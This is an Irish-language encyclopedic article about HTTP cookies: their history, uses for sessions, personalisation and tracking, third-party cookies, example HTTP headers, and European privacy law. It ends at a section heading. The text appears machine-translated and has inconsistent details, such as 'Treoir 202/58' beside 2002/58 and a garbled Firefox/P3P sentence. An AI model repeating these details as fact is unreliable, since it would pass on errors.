Fianán Idirlín: Cad é? Sainmhíniú, Bunús, Cineálacha agus Príobháideacht

Un fianán nó fianán gréasáin (Nó fianán, giorraithe mar finné i Québec) a shainmhínítear sa phrótacal cumarsáide HTTP mar sheicheamh faisnéise a sheol freastalaí HTTP chuig cliant HTTP, a chuireann an freastalaí HTTP ar ais gach uair a cheistítear an freastalaí HTTP céanna faoi choinníollacha áirithe.

Is ionann an fianán agus a comhad téacs beag atá stóráilte ar an teirminéal an úsáideora Idirlín. Tá siad ann le breis agus 20 bliain anuas, ligeann siad d’fhorbróirí láithreán gréasáin sonraí úsáideoirí a stóráil chun a loingseoireacht a éascú agus chun feidhmiúlachtaí áirithe a cheadú. Bhí fianáin níos conspóidí i gcónaí mar go bhfuil faisnéis phearsanta iarmharach iontu a bhféadfadh tríú páirtithe leas a bhaint astu.

Seoltar é mar cheanntásc HTTP ag an bhfreastalaí gréasáin chuig an mbrabhsálaí gréasáin a sheolann ar ais gan athrú gach uair a fhaigheann sé rochtain ar an bhfreastalaí. Is féidir fianán a úsáid chun fíordheimhniú, seisiún (cothabháil stáit), agus le haghaidh stóráil faisnéis shonrach faoin úsáideoir, amhail roghanna suímh nó ábhar cart siopadóireachta leictreonaí. Díorthaítear an téarma fianán ó fianán draíochta, coincheap a bhfuil aithne mhaith air i ríomhaireacht UNIX, a spreag smaoineamh agus ainm fianáin brabhsálaí. Tá roinnt roghanna eile ann seachas fianáin, agus a n-úsáidí, buntáistí agus míbhuntáistí féin ag gach ceann acu.

Toisc gur comhaid téacs simplí iad, níl fianáin inrite. Níl siad ná earraí spiaireachta ná víris, cé go n-aimsíonn go leor bogearraí frithvíreas fianáin ó shuímh áirithe toisc go gceadaíonn siad d’úsáideoirí a rianú nuair a thugann siad cuairt ar láithreáin iolracha. 

Ceadaíonn an chuid is mó de na brabhsálaithe nua-aimseartha d'úsáideoirí cinneadh a dhéanamh maidir le fianáin a ghlacadh nó a dhiúltú. Is féidir le húsáideoirí freisin roghnaigh cé chomh fada agus a stóráiltear fianáin. Mar sin féin, toisc go ndiúltaítear go hiomlán d’fhianáin ní féidir roinnt suíomhanna a úsáid. Mar shampla, cairteacha siopadóireachta a stóráil nó láithreáin a dteastaíonn logáil isteach ag baint úsáide as dintiúir (ainm úsáideora agus pasfhocal).

stairiúil

an téarma fianán eascraíonn as an téarma Béarla fianán draíochta, ar paicéad sonraí é a fhaigheann clár agus a sheolann ar ais gan athrú. Baineadh úsáid as fianáin cheana féin in IT nuair Lou Montulli an smaoineamh iad a úsáid i gcumarsáid gréasáin i Meitheamh 1994. Ag an am sin, bhí sé fostaithe ag Netscape Communications, a raibh feidhmchlár ríomhthráchtála forbartha aige do chliant. Thug fianáin réiteach ar an bhfadhb a bhaineann le hiontaofacht fheidhmiú cairte siopadóireachta fíorúil siopa.

Scríobh John Gianndrea agus Lou Montulli an chéad sonraíocht fianán ó Netscape an bhliain chéanna. Leagan 0.9 beta de Mosaic Netscape, a scaoileadh ar 13 Deireadh Fómhair, 1994, comhtháite teicneolaíocht fianán (féach postáil). Ba é an chéad úsáid (neamhthrgnamhach) a baineadh as fianáin chun a chinneadh ar thug cuairteoirí chuig láithreán Gréasáin Netscape cuairt ar an láithreán roimhe seo. Chomhdaigh Montulli iarratas ar phaitinn do theicneolaíocht fianán i 1995, agus deonaíodh paitinn SAM 5774670. deonaithe i 1998.

Tar éis iad a bheith curtha i bhfeidhm i Netscape 0.9 beta i 1994, rinneadh fianáin a chomhtháthú in Internet Explorer 2, a eisíodh i mí Dheireadh Fómhair 1995.

Ní raibh eolas forleathan ag an bpobal ar thabhairt isteach fianáin. Go háirithe, glacadh le fianáin de réir réamhshocraithe i socruithe brabhsálaí, agus níor cuireadh úsáideoirí ar an eolas faoina láithreacht. Bhí roinnt daoine ar an eolas go raibh fianáin ann timpeall an chéad ráithe de 1995, ach níor ghlac an pobal i gcoitinne leo ach tar éis don Financial Times alt a fhoilsiú an 12 Feabhra 1996. Sa bhliain chéanna, fuair na meáin go leor aird ar fhianáin. mar gheall ar chur isteach príobháideachta féideartha. Pléadh ábhar na bhfianán in dhá chomhairliúchán de chuid Choimisiún Trádála Chónaidhme Mheiriceá i 1996 agus 1997.

Bhí forbairt na sonraíochta fianán oifigiúil ar siúl cheana féin. Tharla an chéad phlé den tsonraíocht oifigiúil i mí Aibreáin 1995 ar an liosta seoltaí www-talk. Bunaíodh grúpa oibre speisialta IETF. Mhol Brian Behlendorf agus David Kristol faoi seach dhá thogra mhalartacha chun idirbhearta stáit a thabhairt isteach le HTTP, ach chinn an grúpa, faoi stiúir Kristol féin, sonraíocht Netscape a úsáid mar phointe tosaigh. I mí Feabhra 1996, chinn an grúpa oibre go raibh fianáin tríú páirtí ina bhagairt shuntasach ar phríobháideacht. Foilsíodh an tsonraíocht a chuir an grúpa ar fáil faoi dheireadh mar RFC 2109.

Ó dheireadh na bliana 2014, feicimid meirge faoi fhianáin ar go leor suíomhanna. Tá síneadh brabhsálaí amháin ar a laghad ann a cheadaíonn an bratach gan taispeáint.

Cineálacha Fianáin agus Úsáidí

Bainistíocht seisiúin

Is féidir fianáin a úsáid chun sonraí úsáideoirí a choinneáil le linn loingseoireachta, ach freisin thar ilchuairteanna. Tugadh isteach fianáin chun bealach a sholáthar chun cairteacha siopadóireachta leictreonacha a chur i bhfeidhm, gléas fíorúil inar féidir leis an úsáideoir na hearraí a theastaíonn uaidh a cheannach a charnadh agus iad ag brabhsáil ar an suíomh.

Na laethanta seo, déanann aipeanna cosúil le cairteacha siopadóireachta an liosta míreanna a stóráil i mbunachar sonraí ar fhreastalaí, rud is fearr; ná iad a shábháil sa fianán féin. Seolann an freastalaí gréasáin fianán ina bhfuil ID seisiúin uathúil. Ansin cuireann an brabhsálaí gréasáin an t-aitheantas seisiúin seo ar ais ar gach iarratas ina dhiaidh sin agus déantar na míreanna sa chiseán a shábháil agus a bhaineann leis an aitheantas seisiúin uathúil seo.

Tá sé úsáideach fianáin a úsáid go minic chun logáil isteach ar shuíomh ag baint úsáide as dintiúir. I mbeagán focal, seolann an freastalaí gréasáin fianán ar dtús ina bhfuil ID seisiúin uathúil. Ansin soláthraíonn úsáideoirí a gcuid dintiúir (ainm úsáideora agus pasfhocal de ghnáth). Fíordheimhníonn an feidhmchlár gréasáin an seisiún ansin agus ligeann sé don úsáideoir rochtain a fháil ar an tseirbhís.

pearsanaithe

Is féidir fianáin a úsáid chun faisnéis a mheabhrú faoi úsáideoir an tsuímh, chun ábhar cuí a thaispeáint dó amach anseo. Mar shampla, is féidir le freastalaí gréasáin fianán a sheoladh ina bhfuil an t-ainm úsáideora deiridh a úsáideadh chun logáil isteach ar an suíomh Gréasáin sin, ionas gur féidir an t-ainm úsáideora a ríomh roimh chuairteanna amach anseo.

Úsáideann go leor suíomhanna Gréasáin fianáin le haghaidh pearsantú bunaithe ar shainroghanna an úsáideora. Roghnaíonn úsáideoirí a roghanna i bhfoirm agus cuireann siad iad seo isteach chuig an bhfreastalaí. Ionchódaíonn an freastalaí na sainroghanna i bhfianán agus seolann sé ar ais chuig an mbrabhsálaí é. Ina dhiaidh sin, gach uair a fhaigheann an t-úsáideoir rochtain ar leathanach den suíomh seo, filleann an brabhsálaí an fianán agus mar sin liosta na roghanna; is féidir leis an bhfreastalaí an leathanach a shaincheapadh ansin de réir roghanna an úsáideora. Mar shampla, ceadaíonn suíomh Gréasáin Vicipéid dá úsáideoirí craiceann an tsuímh is fearr leo a roghnú. Ligeann inneall cuardaigh Google dá úsáideoirí (fiú mura bhfuil siad cláraithe) líon na dtorthaí is mian leo a fheiceáil ar gach leathanach torthaí a roghnú.

Rianú

Úsáidtear fianáin rianaithe chun nósanna brabhsála úsáideoirí idirlín a rianú. Is féidir é seo a dhéanamh go páirteach freisin trí úsáid a bhaint as seoladh IP an ríomhaire a dhéanann iarratas ar leathanach nó trí úsáid a bhaint as an gceanntásc HTTP ‘atreoraithe’ a sheolann an cliant le gach iarratas, ach ceadaíonn fianáin cruinneas níos fearr. Is féidir é seo a dhéanamh mar atá sa sampla seo a leanas:

1. Má ghlaonn an t-úsáideoir suas leathanach ar shuíomh, agus nach bhfuil fianán san iarratas, glacann an freastalaí leis gurb é seo an chéad leathanach ar thug an t-úsáideoir cuairt air. Cruthaíonn an freastalaí teaghrán randamach ansin agus seolann sé chuig an mbrabhsálaí é in éineacht leis an leathanach iarrtha.
2. Ón nóiméad seo, seolfaidh an brabhsálaí an fianán go huathoibríoch gach uair a ghlaoitear leathanach nua den suíomh. Seolfaidh an freastalaí an leathanach mar is gnách, ach logálfaidh sé freisin URL an leathanaigh ar a dtugtar, dáta, am an iarratais agus an fianán i logchomhad.

Trí bhreathnú ar an logchomhad, is féidir a fheiceáil ansin cé na leathanaigh ar thug an t-úsáideoir cuairt orthu agus cén t-ord. Mar shampla, má tá cúpla iarratas sa chomhad a rinneadh ag baint úsáide as an bhfianán id=abc, d'fhéadfadh sé seo a shuíomh go dtagann na hiarratais seo go léir ón úsáideoir céanna. Ligeann an URL a iarradh, an dáta agus an t-am a bhaineann leis na hiarratais brabhsáil an úsáideora a rianú.

Cumasaíonn fianáin tríú páirtí agus rabhcháin ghréasáin, a mhínítear thíos, rianú thar shuímh éagsúla freisin. Go ginearálta úsáidtear rianú aon-láithreáin chun críocha staidrimh. I gcodarsnacht leis sin, is gnách go n-úsáideann cuideachtaí fógraíochta rianú thar láithreáin éagsúla ag baint úsáide as fianáin tríú páirtí chun próifílí úsáideoirí gan ainm a tháirgeadh (a úsáidtear ansin chun a chinneadh cé na fógraí ba chóir a thaispeáint don úsáideoir chomh maith le ríomhphoist a fhreagraíonn do na fógraí seo a sheoladh chuige - SPAM ).

Tá baol ann go ndéanfaí ionradh ar phríobháideachas an úsáideora le fianáin a rianú ach is furasta iad a scriosadh. Áiríonn an chuid is mó de na brabhsálaithe nua-aimseartha rogha chun fianáin leanúnacha a scriosadh go huathoibríoch agus an feidhmchlár á dhúnadh.

Fianáin tríú páirtí

Féadfaidh íomhánna agus rudaí eile atá ar leathanach gréasáin a bheith ina gcónaí ar fhreastalaithe atá difriúil ón gceann a dhéanann óstáil ar an leathanach. Chun an leathanach a thaispeáint, íoslódálann an brabhsálaí na rudaí seo go léir. Tá faisnéis ó fhoinsí éagsúla i bhformhór na suíomhanna Gréasáin. Mar shampla, má chlóscríobhann tú www.example.com isteach i do bhrabhsálaí, is minic a bhíonn rudaí nó fógraí ar chuid den leathanach a thagann ó fhoinsí éagsúla, i.e. ó fhearann ​​eile seachas www.example.com. Is fianáin iad fianáin "chéad pháirtí" a shocraíonn an fearann ​​atá liostaithe i mbarra seoltaí an bhrabhsálaí. Socraítear fianáin tríú páirtí ag ceann de na oibiachtaí leathanaigh a thagann ó fhearann ​​eile.

De réir réamhshocraithe, glacann brabhsálaithe cosúil le Mozilla Firefox, Microsoft Internet Explorer agus Opera le fianáin tríú páirtí, ach is féidir le húsáideoirí na socruithe a athrú i roghanna brabhsálaí chun iad a bhlocáil. Níl aon riosca slándála ag baint le fianáin tríú páirtí a chumasaíonn feidhmiúlacht gréasáin, ach úsáidtear iad freisin chun úsáideoirí a rianú. ó shuíomh go suíomh.

Is féidir le huirlisí cosúil le Ghostery atá ar fáil do gach brabhsálaí lena n-áirítear Google Chrome bac a chur ar mhalartuithe idir tríú páirtithe.

Cur i bhfeidhm

Is píosaí beaga sonraí iad fianáin a sheolann an freastalaí gréasáin chuig an mbrabhsálaí. Tugann an brabhsálaí ar ais iad gan athrú chuig an bhfreastalaí, ag tabhairt staide (cuimhne ar imeachtaí san am atá caite) isteach san idirbheart HTTP gan stát ar shlí eile. Gan fianáin, is imeacht iargúlta é gach aisghabháil leathanach gréasáin nó comhpháirt de leathanach gréasáin, neamhspleách ar iarratais eile a dhéantar ar an suíomh céanna. Chomh maith le bheith in ann iad a shocrú ag an bhfreastalaí gréasáin, is féidir fianáin a shocrú freisin trí theangacha scriptithe ar nós JavaScript, má thacaíonn agus má údaraíonn an brabhsálaí iad.

Molann an tsonraíocht oifigiúil fianán gur cheart go mbeadh brabhsálaithe in ann íoslíon fianán a shábháil agus a athsheoladh. Go sonrach, ba cheart go mbeadh brabhsálaí in ann ar a laghad 300 fianán de cheithre chileabheart an ceann a stóráil, agus 20 fianán ar a laghad le haghaidh freastalaí nó fearainn amháin.

De réir alt 3.1 de RFC 2965, tá ainmneacha fianán cás-neamhíogair.

Is féidir le fianán an dáta éaga a shonrú, agus sa chás sin scriosfar an fianán ar an dáta seo. Mura sonraíonn an fianán dáta éaga, scriostar an fianán a luaithe a fhágann an t-úsáideoir a bhrabhsálaí. Mar sin, is bealach é dáta éaga a shonrú chun an fianán a thabhairt slán trí sheisiúin iolracha. Ar an gcúis seo, deirtear go bhfuil fianáin le dáta éaga leanúnach. Feidhmchlár mar shampla: d’fhéadfadh láithreán miondíola fianáin leanúnacha a úsáid chun na hearraí a chuir úsáideoirí ina dtrála siopadóireachta a thaifeadadh (i ndáiríre, d’fhéadfadh an fianán tagairt a dhéanamh d’iontráil a shábháiltear i mbunachar sonraí ar shuíomh an díola, agus ní ar do ríomhaire) . Tríd an modh seo, má fhágann úsáideoirí a mbrabhsálaí gan ceannach a dhéanamh agus filleadh air níos déanaí, beidh siad in ann na míreanna sa chairt a aimsiú arís. Mura dtabharfadh na fianáin seo dáta éaga, rachadh siad in éag nuair a dúnadh an brabhsálaí, agus chaillfí an t-eolas faoi ábhar an chiseáin.

Is féidir raon feidhme fianáin a theorannú chuig fearann, fofhearann ​​nó cosán ar leith ar an bhfreastalaí a chruthaigh iad.

Cruthú fianán

Baintear úsáid as an bPrótacal Aistrithe Hipirtéacs (HTTP) a aistriú leathanaigh ghréasáin. Trí neamhaird a dhéanamh ar fhianáin, cuireann brabhsálaithe glaoch ar leathanach ó fhreastalaithe gréasáin trí théacs gairid dar teideal a sheoladh chucu Iarratas HTTP. Mar shampla, chun rochtain a fháil ar an leathanach www.example.org/index.html, nascann brabhsálaithe leis an bhfreastalaí www.example.org agus seolann iarratas atá cosúil leis seo:

	GET /index.html HTTP/1.1Host: www.example.org
Navigator	→	freastalaí

Freagraíonn an freastalaí tríd an leathanach iarrtha a sheoladh, agus téacs comhchosúil roimhe, agus glaoitear an t-iomlán Freagra HTTP. Seans go bhfuil línte sa phaicéad seo a thugann treoir don bhrabhsálaí fianáin a stóráil:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: ainm=luach (leathanach HTML)
Navigator	←	freastalaí

Ní sheolann an freastalaí an líne Set-Fianán ach amháin má tá an freastalaí ag iarraidh go stórálfaidh an brabhsálaí fianán. Is éard atá i Set-Cookie ná iarratas ar an mbrabhsálaí an teaghrán ainm=luach a stóráil agus í a sheoladh ar ais chuig an bhfreastalaí i ngach iarratas amach anseo. Má thacaíonn an brabhsálaí le fianáin agus má tá fianáin cumasaithe i roghanna an bhrabhsálaí, cuirfear an fianán san áireamh i ngach iarratas a dhéanfar ina dhiaidh sin chuig an bhfreastalaí céanna. Mar shampla, glaonn an brabhsálaí an leathanach www.example.org/news.html tríd an iarratas seo a leanas a sheoladh chuig an bhfreastalaí www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
Navigator	→	freastalaí

Is iarratas é seo ar leathanach eile ón bhfreastalaí céanna, agus tá sé difriúil ón gcéad cheann thuas toisc go bhfuil teaghrán ann a sheol an freastalaí chuig an mbrabhsálaí roimhe seo. A bhuí leis an modh seo, tá a fhios ag an bhfreastalaí go bhfuil an t-iarratas seo nasctha leis an gceann roimhe seo. Freagraíonn an freastalaí tríd an leathanach ar a dtugtar a sheoladh, agus freisin trí fhianáin eile a chur leis.

Is féidir leis an bhfreastalaí luach an fhianán a athrú trí Set-Fianán nua: ainm=new_value a sheoladh mar fhreagra ar an leathanach ar a dtugtar. Ansin cuireann an brabhsálaí an seanluach in ionad an luach nua.

De ghnáth is clár CGI nó teanga scriptithe eile a chruthaíonn an líne Set-Fianán, ní ag an bhfreastalaí HTTP. Ní dhéanfaidh an freastalaí HTTP (mar shampla: Apache) ach toradh an chláir (doiciméad a bhfuil an ceanntásc ina bhfuil na fianáin roimhe) a tharchur chuig an mbrabhsálaí.

Is féidir fianáin a shocrú freisin le JavaScript nó le teangacha eile dá samhail a ritheann sa bhrabhsálaí, i.e. ar thaobh an chliaint seachas ar thaobh an fhreastalaí. I JavaScript, úsáidtear an réad document.cookie chun na críche seo. Mar shampla, cruthaíonn an ráiteas document.cookie = "teocht=20" fianán darb ainm "teocht" agus a bhfuil luach 20 air.

Tréithe fianán

Chomh maith leis an ainm/an luach péire, is féidir le fianán dáta éaga, conair, ainm fearainn agus an cineál naisc atá beartaithe, i.e. gnáth nó criptithe, a bheith i bhfianán. Sainmhíníonn RFC 2965 freisin go gcaithfidh uimhir leagain éigeantach a bheith ag fianáin, ach fágtar é seo ar lár go ginearálta. Leanann na codanna sonraí seo an t-ainm=péire_luach_nua agus tá siad scartha le leathcholúin. Mar shampla, is féidir leis an bhfreastalaí fianán a chruthú trí líne Set-Fianán a sheoladh: ainm=new_value; éag = dáta; cosán=/; fearainn=.example.org.

Dul in éag fianán

Téann fianáin in éag agus ansin ní sheolann an brabhsálaí chuig an bhfreastalaí iad sna cásanna seo a leanas:

• Nuair a bhíonn an brabhsálaí dúnta, mura bhfuil an fianán leanúnach.
• Nuair a bheidh dáta éaga an fhianán caite.
• Nuair a athraítear dáta éaga an fhianán (ag an bhfreastalaí nó an script) go dtí dáta san am atá thart.
• Nuair a scriosann an brabhsálaí an fianán ar iarratas ón úsáideoir.

Ligeann an tríú cás do fhreastalaithe nó scripteanna fianán a scriosadh go sainráite. Tabhair faoi deara gur féidir le brabhsálaí gréasáin Google Chrome dáta éaga fianán ar leith a fhios trí rochtain a fháil ar na socruithe inneachair. D’fhéadfadh sé go bhfanfadh fianán a shábháiltear ar ríomhaire ann ar feadh na mblianta fada mura nglactar nós imeachta chun é a scriosadh.

Steiréitíopaí

Ó tugadh isteach iad ar an Idirlíon, tá go leor smaointe faoi fhianáin scaipthe ar an Idirlíon agus sna meáin. Sa bhliain 1998, chinn CIAC, foireann monatóireachta teagmhais ríomhaireachta de chuid Roinn Fuinnimh na Stát Aontaithe, go raibh leochaileachtaí slándála fianán "neamh-ann go bunúsach" agus mhínigh siad go raibh "faisnéis faoi bhunús do chuairteanna agus sonraí na leathanach gréasáin ar thug tú cuairt orthu. ann cheana i gcomhaid logála na bhfreastalaithe gréasáin”. In 2005, d’fhoilsigh Jupiter Research torthaí staidéir, inar bhreithnigh céatadán suntasach freagróirí na ráitis seo a leanas:

• Is cosúil le fianáin víreas, ionfhabhtaíonn siad tiomántáin chrua úsáideoirí.
• Gineann fianáin pop-up.
• Úsáidtear fianáin le seoladh spam.
• Úsáidtear fianáin le haghaidh fógraíochta amháin.

Ní féidir le fianáin faisnéis a scriosadh nó a léamh ó ríomhaire an úsáideora. Mar sin féin, le fianáin is féidir na leathanaigh ghréasáin ar thug úsáideoir cuairt orthu ar shuíomh nó ar thacar suíomhanna ar leith a bhrath. Is féidir an fhaisnéis seo a bhailiú i bpróifíl úsáideora is féidir a úsáid nó a athdhíol le tríú páirtithe, rud a d’fhéadfadh ceisteanna príobháideachais tromchúiseacha a bheith ann. Tá próifílí áirithe gan ainm, sa chiall nach bhfuil aon fhaisnéis phearsanta iontu, ach is féidir fiú próifílí den sórt sin a bheith amhrasach.

De réir an staidéir chéanna, níl a fhios ag céatadán mór úsáideoirí Idirlín conas fianáin a scriosadh. Ceann de na cúiseanna nach bhfuil muinín ag daoine as fianáin is ea gur bhain roinnt suíomhanna feidhm as gné aitheantais phearsanta na bhfianán agus gur roinneadh an fhaisnéis seo le foinsí eile. Tagann céatadán mór d’fhógraíocht spriocdhírithe agus ríomhphoist gan iarraidh, a mheastar a bheith ina turscar, ó fhaisnéis a fuarthas ó fhianáin rianaithe.

Socruithe brabhsálaí

Tacaíonn formhór na mbrabhsálaithe le fianáin agus ligeann siad don úsáideoir iad a dhíchumasú. Is iad na roghanna is coitianta:

• Déan fianáin a chumasú nó a dhíchumasú go hiomlán, ionas go nglactar leo i gcónaí nó go gcuirtear bac orthu.
• Lig don úsáideoir na fianáin gníomhacha a fheiceáil ar leathanach áirithe, trí javascript: alert(document.cookie) a chur isteach i mbarra seoltaí an bhrabhsálaí. Ionchorpraíonn roinnt brabhsálaithe bainisteoir fianán don úsáideoir ar féidir leis na fianáin atá stóráilte ag an mbrabhsálaí faoi láthair a fheiceáil agus a scriosadh go roghnach.

Ligeann formhór na mbrabhsálaithe sonraí pearsanta a scriosadh go hiomlán lena n-áirítear fianáin. Tá modúil bhreise ann freisin chun ceadanna fianán a rialú.

Príobháideacht agus Fianáin Tríú Páirtí

Sa sampla bréige seo, tá meirgí curtha ag cuideachta fógraíochta ar dhá shuíomh Gréasáin. Trí na meirgí a óstáil ar a freastalaithe agus trí úsáid a bhaint as fianáin tríú páirtí, tá an chuideachta fógraíochta in ann nascleanúint an úsáideora a rianú tríd an dá shuíomh seo.

Tá impleachtaí tábhachtacha ag fianáin ar phríobháideachas agus anaithnideacht úsáideoirí gréasáin. Cé nach seoltar fianáin ar ais ach chuig an bhfreastalaí a shocraigh iad nó chuig freastalaí a bhaineann leis an bhfearann ​​Idirlín céanna, féadfaidh íomhánna nó comhpháirteanna eile atá stóráilte ar fhreastalaithe a bhaineann le fearainn eile a bheith ar leathanach gréasáin. Tugtar na fianáin a shocraítear le linn na comhpháirteanna seachtracha seo a aisghabháil fianáin tríú páirtí. Áirítear leis seo fianáin ó fhuinneoga aníos nach dteastaíonn.

Úsáideann cuideachtaí fógraíochta fianáin tríú páirtí chun úsáideoirí a rianú thar na suíomhanna éagsúla a dtugann siad cuairt orthu. Go háirithe, is féidir le cuideachta fógraíochta úsáideoir a rianú thar gach leathanach ina bhfuil íomhánna fógraíochta nó picteilín rianaithe curtha aici. Cuireann eolas ar na leathanaigh a dtugann an t-úsáideoir cuairt orthu ar chumas na cuideachta fógraíochta díriú ar shainroghanna fógraíochta an úsáideora.

Measann roinnt daoine gur ionradh príobháideachta é an cumas próifíl úsáideora a thógáil, go háirithe nuair a dhéantar rianú thar réimsí éagsúla ag baint úsáide as fianáin tríú páirtí. Ar an gcúis seo, tá reachtaíocht fianán ag roinnt tíortha.

Chuir rialtas na Stát Aontaithe rialacha dochta i bhfeidhm maidir le socrúchán fianán i 2000, tar éis dó a nochtadh go raibh an Oifig um Beartas Drugaí sa Teach Bán ag baint úsáide as fianáin chun ríomhairí úsáideoirí a bhí ag breathnú ar fhógraí drugaí ar líne a rianú. In 2002, fuair an gníomhaí príobháideachta Daniel Brandt amach gur fhág an CIA fianáin leanúnacha ar ríomhairí a thug cuairt ar a láithreáin ghréasáin. Nuair a cuireadh an sárú sin ar an eolas, dhearbhaigh an CIA nár seoladh na fianáin seo d’aon ghnó agus scoir sé dá socrú. Ar an 25 Nollaig, 2005, fuair Brandt amach go raibh dhá fhianán leanúnacha fágtha ag an nGníomhaireacht Náisiúnta Slándála (NSA) ar ríomhairí cuairteoirí mar gheall ar nuashonrú bogearraí. Tar éis fógra a fháil, dhíchumasaigh an NSA fianáin láithreach.

Sa Ríocht Aontaithe, tá an Dlí fianáin “, a tháinig i bhfeidhm an 25 Bealtaine 2012, cuireann sé d’oibleagáid ar na suíomhanna a n-intinn a dhearbhú, rud a ligeann d’úsáideoirí rogha a dhéanamh an bhfuil siad ag iarraidh rian a fhágáil ar an Idirlíon nó nach bhfuil. Mar sin is féidir iad a chosaint ó spriocdhíriú fógraíochta. Ach, de réir The Guardian, ní gá go mbeadh toiliú úsáideoirí Idirlín follasach; rinneadh athruithe ar théarmaí toilithe an úsáideora, rud a fhágann mar sin intuigthe.

Treoir 2002/58 maidir le príobháideachas

Treoir 202/58 príobháideachta agus cumarsáid leictreonach, tá rialacha maidir le húsáid fianán. Go háirithe, éilíonn Airteagal 5, mír 3 den treoir seo nach féidir sonraí a stóráil (amhail fianáin) i ríomhaire an úsáideora ach amháin:

• cuirtear an t-úsáideoir ar an eolas faoin gcaoi a n-úsáidtear na sonraí;
• tugtar an rogha don úsáideoir an oibríocht stórála seo a dhiúltú. Mar sin féin, luaitear san Airteagal seo freisin go bhfuil stóráil sonraí ar chúiseanna teicniúla díolmhaithe ón dlí seo.

Le cur i bhfeidhm ó Dheireadh Fómhair 2003, níor cuireadh an treoir i bhfeidhm ach go han-neamhfhoirfe, áfach, de réir tuarascála i mí na Nollag 2004, inar cuireadh in iúl freisin nach raibh Ballstáit áirithe (an tSlóvaic, an Laitvia, an Ghréig, an Bheilg agus Lucsamburg) tar éis an treoir a thrasuí go fóill. Treoir sa dlí baile.

De réir thuairim an G29 in 2010, tá an treoir seo, a chuireann coinníollacha go háirithe ar úsáid fianáin chun críocha fógraíochta iompraíochta, ar thoiliú sainráite an úsáideora Idirlín i bhfeidhm go han-lag go fóill. Go deimhin, déanann an chuid is mó de na suíomhanna é sin ar bhealach nach gcomhlíonann an treoir, trí iad féin a theorannú do "meirge" simplí a chuireann in iúl d'úsáid "fianáin" gan faisnéis a thabhairt ar na húsáidí, gan idirdhealú a dhéanamh idir fianáin "theicniúla". fianáin “rianaithe”, ná fíor-rogha a thairiscint don úsáideoir ar mian leis fianáin theicniúla a choinneáil (cosúil le fianáin bhainistíochta cart siopadóireachta) agus fianáin “rianaithe” a dhiúltú. Go deimhin, ní fheidhmíonn go leor suíomhanna i gceart má dhiúltaítear fianáin, nach gcomhlíonann treoir 2002/58 nó Treoir 95/46 (Cosaint sonraí pearsanta).

Treoir 2009/136 / CE

Nuashonraíodh an t-ábhar seo le Treoir 2009/136/CE dar dáta an 25 Samhain 2009 a shonraíonn “go gceadaítear faisnéis a stóráil, nó rochtain a fháil ar fhaisnéis atá stóráilte cheana féin, i dtrealamh teirminéil suibscríobhaí nó úsáideora a cheadú ach amháin ar an gcoinníoll nach gceadaítear an fhaisnéis sin. tá a thoiliú tugtha ag an síntiúsóir nó ag an úsáideoir, tar éis dó, i gcomhréir le Treoir 95/46/CE, faisnéis shoiléir agus iomlán a fháil, idir daoine eile maidir le críocha na próiseála”. Dá bhrí sin, neartaíonn an treoir nua na hoibleagáidí sula gcuirtear fianáin ar ríomhaire an úsáideora Idirlín.

I réamhbhreithnithe na Treorach, sonraíonn an reachtóir Eorpach an méid seo a leanas, áfach: “I gcás inar féidir agus nuair a bheidh sé éifeachtach go teicniúil, i gcomhréir le forálacha ábhartha Threoir 95/46/CE, féadfar toiliú an úsáideora maidir leis an bpróiseáil a chur in iúl tríd an gComhairle. úsáid a bhaint as socruithe cuí brabhsálaí nó feidhmchlár eile”. Ach i ndáiríre, ní féidir le brabhsálaí ar bith go dtí seo na fianáin theicniúla riachtanacha a dhícheangal ó na cinn roghnacha ar cheart a fhágáil faoi rogha an úsáideora.

Rinne Feisirí na Beilge an treoir nua seo a thrasuíomh i mí Iúil 2012. Léiríonn staidéar a rinneadh in 2014 go mbíonn sé ag streachailt fiú le Feisirí iarratas a dhéanamh srianta na treorach.

P3P

Áirítear sa tsonraíocht P3P an cumas atá ag freastalaí polasaí príobháideachta a lua, a shainíonn cén cineál faisnéise a bhailíonn sé agus cén cuspóir atá leis. Áirítear leis na beartais seo (ach níl siad teoranta dóibh) úsáid faisnéise a bhailítear trí úsáid a bhaint as fianáin. De réir sainmhínithe P3P, is féidir le brabhsálaí fianáin a ghlacadh nó a dhiúltú trí na polasaithe príobháideachta a chur i gcomparáid le roghanna an úsáideora nó trí iarraidh ar an úsáideoir, an ráiteas príobháideachta polasaí príobháideachta a dhearbhaigh an freastalaí a chur i láthair.

Tacaíonn go leor brabhsálaithe, lena n-áirítear Apple Safari agus Microsoft Internet Explorer leaganacha 6 agus 7, le P3P a ligeann don bhrabhsálaí a chinneadh an nglacfaidh sé le stóráil fianán tríú páirtí. Ligeann an brabhsálaí Opera d’úsáideoirí fianáin tríú páirtí a dhiúltú agus próifíl slándála dhomhanda agus shainiúil a chruthú d’fhearainn Idirlín. Thit tacaíocht P2P de Mozilla Firefox 3 ach chuir sé ar ais é i leagan 3.

Is féidir le formhór na mbrabhsálaithe fianáin tríú páirtí a bhacadh chun príobháideacht a mhéadú agus chun rianú fógraí a laghdú, gan cur isteach go diúltach ar thaithí gréasáin an úsáideora. Cuireann go leor gníomhaireachtaí fógraíochta rogha ar fáil diúltaithe le fógraíocht spriocdhírithe, trí fhianán cineálach a shocrú sa bhrabhsálaí a dhíghníomhaíonn an spriocdhíriú seo, ach níl a leithéid de réiteach éifeachtach go praiticiúil, nuair a urramaítear é, toisc go scriostar an fianán cineálach seo chomh luath agus a scriosann an t-úsáideoir na fianáin seo a chealaíonn an rogha rogha. amach cinneadh.

Míbhuntáistí fianáin

Chomh maith le saincheisteanna príobháideachais, tá roinnt míbhuntáistí teicniúla ag baint le fianáin. Go háirithe, ní shainaithníonn siad úsáideoirí go cruinn i gcónaí, is féidir leo feidhmíocht an tsuímh a mhoilliú nuair a bhíonn líon mór díobh, is féidir iad a úsáid le haghaidh ionsaithe slándála, agus coinbhleacht siad leis an aistriú stáit ionadaíoch, stíl ailtireachta na bogearraí.

Sainaithint mhíchruinn

